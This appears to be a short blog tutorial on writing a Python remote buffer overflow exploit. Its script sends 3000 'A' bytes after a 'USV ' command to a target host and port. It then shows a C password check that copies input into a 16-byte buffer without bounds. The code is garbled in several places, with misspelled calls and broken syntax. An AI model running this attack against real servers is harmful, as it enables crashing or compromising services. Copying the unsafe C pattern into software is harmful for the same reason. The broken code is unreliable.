How to exploit remote buffer overflow with python

Step by Step Coding Remote Buffer Overflow Exploit with Python:

for carg in sys.argv:
            if carg == “-s”:
                        argnum = sys.argv.index(carg)
                        argnum += 1
                        host = sys.argv[argnum]
            elif carg == “-p”:
                        argnum = sys.argv.index(carg)
                        argnum += 1
                        port = sys.argv[argnum[
buffer = “\x41″* 3000
s = socket.socket(socket.AF_INET, socket.SOCK_STRAEM)
s.connect((host,port))
s.send(“USV ” + buffer + “//r//n//r”)
s.close()
Code should look like this:
buffer_overflow_exp1

Now, lets analyze the code. We already know the argument indentification script from my previous tutorial.  The second line makes a buffer, that is \x41 multiplied 3000 times. Then we see the lines of declaring s as socket, connecting with it, sending the buffer and closing the socket. Looks pretty hard, but it isnt.
After you have done these steps above, its time to test out our script!
buffer_overflow_exp2
This depends on programming language. As example, on C, you can be vulnerable to remote buffer overflow if you use code like this:
int authed = 0;
char password_buffer[16];
strcopy(password_buffer, your_password)
if (strcmp(password_buffer, password) == 0) {
authed = 1;
}
else {
authed = 0;
}
So, once the your_password is over 16, you can implement auth overflow, or if there are even more, you can get buffer overflow with segmentation fault error.
Take your time to comment on this article.
Libellés : ,

Enregistrer un commentaire

[blogger]

Author Name

Haykel Maaoui

Formulaire de contact

Nom

E-mail *

Message *

Fourni par Blogger.